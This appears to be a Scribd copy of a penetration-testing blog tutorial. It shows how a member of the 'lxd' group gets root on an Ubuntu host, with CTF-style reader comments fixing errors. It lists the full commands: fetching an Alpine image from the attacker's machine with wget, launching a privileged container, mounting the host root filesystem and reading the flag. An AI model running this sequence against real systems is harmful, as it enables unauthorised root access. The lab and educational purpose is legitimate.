Scribd
Upload
19 views10 pages

Linux Privilege Escalation Ressource

The document discusses a method for privilege escalation on a system using LXD, where a user in the 'lxd' group can gain root access without needing sudo rights. It outlines the steps to install and configure LXD, create a container, and exploit the system to escalate privileges. The article also includes troubleshooting tips and user comments related to the process.

Uploaded by

toolsbot32
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
19 views10 pages

Linux Privilege Escalation Ressource

The document discusses a method for privilege escalation on a system using LXD, where a user in the 'lxd' group can gain root access without needing sudo rights. It outlines the steps to install and configure LXD, create a container, and exploit the system to escalate privileges. The article also includes troubleshooting tips and user comments related to the process.

Uploaded by

toolsbot32
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 10

Hacking Articles

Raj Chandel’s Blog

Privilege Escalation

Lxd Privilege Escalation

October 12, 2019 By Raj

In this post we are going to describes how an account on the system that is a member of the
lxd group is able to escalate the root privilege by exploiting the features of LXD.

A member of the local “lxd” group can instantly escalate the privileges to root on the host
operating system. This is irrespective of whether that user has been granted sudo rights and
does not require them to enter their password. The vulnerability exists even with the LXD snap
package.

LXD is a root process that carries out actions for anyone with write access to the LXD UNIX
socket. It often does not attempt to match the privileges of the calling user. There are multiple
methods to exploit this.

One of them is to use the LXD API to mount the host’s root filesystem into a container which is
going to use in this post. This gives a low-privilege user root access to the host filesystem.

Table of Content

Introduction to LXD and LXC


Container Technology
LXD Installation and Configuration
LXD Installation and Configuration

Introduction to LXD and LXC

Linux Container (LXC) are often considered as a lightweight virtualization technology that is
something in the middle between a chroot and a completely developed virtual machine, which
creates an environment as close as possible to a Linux installation but without the need for a
separate kernel.

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
Linux daemon (LXD) is the lightervisor, or lightweight container hypervisor. LXD is building on
top of a container technology called LXC which was used by Docker before. It uses the stable
LXC API to do all the container management behind the scene, adding the REST API on top
and providing a much simpler, more consistent user experience.

Container Technology

Container technology comes from the container, is a procedure to assemble an application so


that it can be run, with its requirements, in isolation from other processes container
applications with names like Docker and Apache Mesos ‘ popular choices have been introduced
by major public cloud vendors including Amazon Web Services, Microsoft Azure and Google
Cloud Platforms.

Requirement

Host machine: ubuntu 18:04

Attacker machine: Kali Linux or any other Machine

Let’s Begin !!

So here you can observe that we have a profile for user “raj” as a local user account on the host
machine.

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
LXD Installation and Configuration

Now install lxd by executing the following command:

apt install lxd

Also, you need to install some dependency for lxd:

apt install zfsutils-linux

Now to add a profile for user: raj into the lxd group, type following command:

usermod --append --groups lxd raj

So now you can observe user “raj” is part of lxd groups.

Now you can configure LXD and start the LXD initialization process with the lxd init command.
During initialization it will ask for choosing some option, here majorly we have gone with

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
DEFAULT options. But for the storage backend, we have choose “dir” instead of zfs.

Once you have configured the lxd then you can create a container using lxc. Here we are
creating a container for “ubuntu:18.04” and named as “intimate-seasnail”. Further use lxc list
command to view the available installed containers.

lxc launch ubuntu:18.04


lxc list

Connect to the container withthe help of lxc exec command, which takes the name of the
container and the commands to execute:

lxc exec intimate-seasnail -- /bin/bash

Once your are inside the container, the shell prompt will look like as following below.

Privilege Escalation

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
Privilege escalation through lxd requires the access of local account, therefore, we choose SSH
to connect and take the access local account on host machine.

Note: the most important condition is that the user should be a member of lxd group.

ssh [email protected]

In order to take escalate the root privilege of the host machine you have to create an image for
lxd thus you need to perform the following the action:

1. Steps to be performed on the attacker machine:

Download build-alpine in your local machine through the git repository.


Execute the script “build -alpine” that will build the latest Alpine image as a
compressed file, this step must be executed by the root user.
Transfer the tar file to the host machine

2. Steps to be performed on the host machine:

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
Download the alpine image
Import image for lxd
Initialize the image inside a new container.
Mount the container inside the /root directory

So, we downloaded the build alpine using the GitHub repose.

git clone https://github.com/saghul/lxd-alpine-builder.git


cd lxd-alpine-builder
./build-alpine

On running the above command, a tar.gz file is created in the working directory that we have
transferred to the host machine.

python -m SimpleHTTPServer

On another hand we will download the alpine-image inside /tmp directory on the host machine.

cd /tmp
wget http://192.168.1.107:8000/apline-v3.10-x86_64-20191008_1227.tar.g

After the image is built it can be added as an image to LXD as follows:

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
lxc image import ./alpine-v3.10-x86_64-20191008_1227.tar.gz --alias my

use the list command to check the list of images

lxc image list

lxc init myimage ignite -c security.privileged=true


lxc config device add ignite mydevice disk source=/ path=/mnt/root rec
lxc start ignite
lxc exec ignite /bin/sh
id

Once inside the container, navigate to /mnt/root to see all resources from the host machine.

After running the bash file. We see that we have a different shell, it is the shell of the container.
This container has all the files of the host machine. So, we enumerated for the flag and found it.

mnt/root/root
ls
flag.txt
cat flag.txt

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
Source: https://bugs.launchpad.net/ubuntu/+source/lxd/+bug/1829071

Author: Kavish Tyagi is a Cybersecurity enthusiast and Researcher in the field of WebApp
Penetration testing. Contact here

11 thoughts on “Lxd Privilege Escalation”

Sammeer
October 20, 2019 at 7:03 am

Is there any login credential go ‘isro’ ctf machine. Netdiscover doesn’t find the
machine.

Reply

Viral Sangani
October 22, 2019 at 5:38 am

arp -a will give you ip of machine.


Keep network to host only.

Reply

Kala
July 28, 2020 at 6:58 pm

it keeps giving no such a file or directory…when importing

Reply

Emil
September 7, 2020 at 11:34 am

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
you have to download the image to a different directory and then try to import

Reply

Sikotic
April 5, 2021 at 1:38 pm

It appears that build-alpine is broken and it doesn’t download the


MIRRORS.txt file properly, which presented me wiht the “No such file or
directory” error.
To resolve this you can manually download the mirrors file from http://dl-
cdn.alpinelinux.org/alpine/MIRRORS.txt and create it manually.

After this I found that it failed to get alpine from the mirror it chose for me so I
removed them all but the first one and it worked. YMMV, you might have to try
a few before you get it working.

Reply

adubs
April 6, 2021 at 8:09 am

Thank you @Sikotic, just finished a box because of your comment and link. I
also had to manually add the alpine-mirrors and MIRRORS.txt to the share
directory. Just in case anyone else comes across this. Great article, thanks
again for the help.

Reply

vishal patil
May 25, 2021 at 3:56 pm

lxc init myimage ignite -c security.privileged=true


after this command if you get error :-

just do $ lxd init


and type enter as default and when it will ask CIDR subnet notation, “auto” or
“none” type none.

Its important for this particular machine that when asked What IPv6 address
should be used? (CIDR subnet notation, “auto” or “none”) to provide the option none
otherwise creating a storage pool will fail.

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF
then start from -: lxc init myimage ignite -c security.privileged=true
Reply

SongBird0x1337
May 26, 2021 at 11:53 am

May I suggest that you make this change in the following command :
lxc init myimage ignite -c security.privileged=true
To :
lxc init myimage ignite -c security.privileged=true && lxd init –auto

Otherwise it throws an error telling you to create a new storage first.

Reply

vishal patil
June 1, 2021 at 5:31 pm

i just tried lxc init myimage ignite -c security.privileged=true && lxd init –auto but
it still saying
Error: No storage pool found. Please create a new storage pool

so i suggest you to use my first method which is my first comment

Reply

Vikramaditya
June 1, 2021 at 7:51 pm

Sorry I meant to edit that comment.


It was supposed to be :
lxc image import [alpine_image] –alias [alpine_alias] && lxd init –auto

Reply

b31ngd3v
June 23, 2021 at 10:46 am

Thanks

Reply

Explore our developer-friendly HTML to PDF API Printed using PDFCrowd HTML to PDF

You might also like